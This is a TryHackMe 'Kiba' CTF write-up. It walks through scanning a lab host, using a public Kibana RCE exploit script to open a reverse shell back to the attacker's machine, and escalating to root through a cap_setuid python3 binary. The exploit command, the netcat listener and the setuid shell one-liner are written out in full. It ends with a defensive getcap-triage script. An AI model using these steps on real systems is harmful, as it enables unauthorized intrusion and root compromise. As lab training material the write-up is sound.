Kiba
THM writeup for exploiting Kibana RCE
Target Details
Target IP: 10.10.252.150
Scan Target
Run the usual Nmap scan (default scripts, version detection, no host discovery) and save the output:
$ nmap -sCV -Pn -oN nmap.txt 10.10.252.150
$ cat nmap.txt
Nmap scan report for 10.10.252.150
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9df8d157132481b6185d048ed2384f90 (RSA)
| 256 e1e67aa1a11cbe03d24e271b0d0aecb1 (ECDSA)
|_ 256 2abae5c5fb51381745e7b154caa1a3fc (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 15 12:19:16 2023 -- 1 IP address (1 host up) scanned in 114.46 seconds
Nmap found no other open ports, but note that without -p- this scan only covers the default top 1000 TCP ports, and Kibana's default port is not among them. Since the room is about Kibana, a quick search for its port confirms that Kibana listens on 5601 by default, and a full-range port scan would have turned it up as well.
Hosted Services Summary
Port   Service
22     OpenSSH 7.2p2
80     Apache httpd 2.4.18
5601   Kibana
Navigating Kibana
Visit the Kibana dashboard hosted on http://10.10.252.150:5601

The dashboard loads without prompting for credentials, so we are logged in as the default user, and the Management tab looks interesting.
Navigate to the Management tab.

Searching for Kibana Vulnerabilities and Exploits
Search for Kibana exploits on your favorite search engine.
A Tenable advisory with RCE details turns up.

On reading the analysis we find that the P{REDACTED} P{REDACTION} vulnerability can be exploited to gain a reverse shell.
Exploiting Kibana RCE Vuln
The Tenable page also links to the exploit script.
Clone the GitHub repo.
The script was written for Python 2. Under Python 3 the response body (content.data) is a bytes object, so to run it with python3 decode it before it is used as a string:
content.data -> content.data.decode('utf-8')
Start a netcat listener to catch the reverse shell:
nc -nlvp 1234
Run the exploit, pointing -host at your THM VPN address:
./CVE-XXXX-XXXX-kibana-rce.py -u http://10.10.252.150:5601 -host [YOUR_THM_IP] -p 1234 --shell
Now we've successfully received a reverse shell on our machine. The shell lands in /home/kiba/kibana/bin, i.e. Kibana runs as the unprivileged user kiba rather than root; the "no job control" warnings only mean the shell is not attached to a tty.
$ nc -nlvp 1234
Connection from 10.10.252.150:34696
bash: cannot set terminal process group (942): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kiba@ubuntu:/home/kiba/kibana/bin$
Capturing Flags
Get the user.txt flag
kiba@ubuntu:/home/kiba/kibana/bin$ cd ~
kiba@ubuntu:/home/kiba$ ls
elasticsearch-6.5.4.deb kibana user.txt
kiba@ubuntu:/home/kiba$ cat user.txt
cat user.txt
THM{REDACTED}
kiba@ubuntu:/home/kiba$
A quick search for how to list file capabilities on Ubuntu gives getcap. Execute it on the captured shell; the errors for directories we cannot read go to stderr, so they can be silenced:
$ getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
The directory name .hackmeplease is a hint that we are meant to use this python3 binary. cap_setuid+ep means the file carries CAP_SETUID in its permitted set with the effective bit set, so any process started from it may call setuid() to an arbitrary uid, including 0, without being root. Because the binary is a Python interpreter, we can do exactly that with the os module and then spawn a shell, which inherits uid 0:
/home/kiba/.hackmeplease/python3 -c "import os,pty; os.setuid(0); pty.spawn('/bin/bash');"
Only the uid changes here: CAP_SETGID is not granted, so the shell keeps kiba's groups, but uid 0 is all that is needed to read /root. pty.spawn also gives us a proper tty at the same time.
Read root flag
root@ubuntu# cat /root/root.txt
THM{REDACTED}
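The privilege escalation above hinged on spotting one dangerous capability in the getcap listing. The following script is an added example for this writeup (not part of the THM room or of any tool used in it): it parses getcap output in both the older "/path = caps+ep" and newer "/path caps=ep" formats, flags the capabilities that give a local user root-equivalent power, and distinguishes grants that are live for any program (effective bit set) from permitted-only grants that only capability-aware code can raise. The sample input is the four lines from the listing above plus one constructed line; the capability summaries and the DANGEROUS list are this example's own judgement, not from the writeup.

```python
"""Triage getcap output for file capabilities that a low-privileged user can
turn into root. Added example for this writeup, not part of the THM room or
any tool it uses. Sample lines are the four getcap results from the room plus
one constructed line in the newer libcap output format."""
import re
import subprocess

# Capabilities that hand root-equivalent power to whoever can run the file.
# The one-line summaries are this example's own, not from the writeup.
DANGEROUS = {
    "cap_setuid": "setuid(0) from inside the program, e.g. python3 -c 'os.setuid(0)'",
    "cap_setgid": "setgid(0): root-group access to files such as /etc/shadow",
    "cap_dac_override": "bypass read/write/execute permission checks on files",
    "cap_dac_read_search": "read any file and traverse any directory",
    "cap_chown": "chown arbitrary files (e.g. take ownership of /etc/passwd)",
    "cap_fowner": "chmod files owned by other users",
    "cap_sys_admin": "mount, namespaces and much more: effectively root",
    "cap_sys_ptrace": "attach to root-owned processes and inject code",
    "cap_sys_module": "load kernel modules",
    "cap_setfcap": "grant arbitrary file capabilities to other binaries",
}

# One clause of a capability set, e.g. "cap_setuid+ep" or "cap_a,cap_b=eip".
CLAUSE_RE = re.compile(r"^(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap(line):
    """Parse one getcap line into (path, [(capability, flags), ...]).

    Handles both output styles: "/path = caps+ep" (libcap before 2.41) and
    "/path caps=ep" (libcap 2.41 and later). Returns None for blank or
    unparseable lines. Paths containing spaces are not handled.
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, capstr = line.split(" = ", 1)
    else:
        parts = line.split(None, 1)
        if len(parts) != 2:
            return None
        path, capstr = parts
    entries = []
    for clause in capstr.split():
        m = CLAUSE_RE.match(clause)
        if m:
            for cap in m.group("caps").split(","):
                entries.append((cap, m.group("flags")))
    return (path, entries) if entries else None


def triage(getcap_output):
    """Return the dangerous capability grants found in getcap output.

    'effective' is True when the flags contain both e and p: the capability
    is then live for any program, including a non-capability-aware one such
    as a stock interpreter. With only p set, the program has to raise the
    capability itself, which only capability-aware code does.
    """
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap(line)
        if parsed is None:
            continue
        path, entries = parsed
        for cap, flags in entries:
            if cap in DANGEROUS:
                findings.append({
                    "path": path,
                    "cap": cap,
                    "effective": "e" in flags and "p" in flags,
                    "why": DANGEROUS[cap],
                })
    return findings


# First four lines: the getcap results from the room. Last line: constructed,
# newer output format, permitted-only, to show the 'effective' distinction.
SAMPLE = """\
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/capaware-example cap_setuid=p
"""


def run_live():
    """Run getcap on this host and triage it (needs libcap's getcap installed)."""
    try:
        out = subprocess.run(["getcap", "-r", "/"], capture_output=True,
                             text=True, check=False).stdout
    except FileNotFoundError:
        return []
    return triage(out)


if __name__ == "__main__":
    for f in triage(SAMPLE):
        live = "effective" if f["effective"] else "permitted only"
        print(f"{f['path']}: {f['cap']} ({live}) - {f['why']}")
```

On the sample this reports python3 (cap_setuid), systemd-detect-virt (cap_dac_override and cap_sys_ptrace) and the constructed permitted-only entry, and ignores the cap_net_raw grants on mtr and traceroute6. A hit is a lead, not a guaranteed root: systemd-detect-virt carries those two capabilities on stock Ubuntu and gives the caller no way to use them, whereas an interpreter such as python3 does whatever it is told, which is why the .hackmeplease binary is the one that matters. The fix on the defensive side is to strip the grant with setcap -r on the binary and ask why a copy of the interpreter was sitting in a user's home directory in the first place.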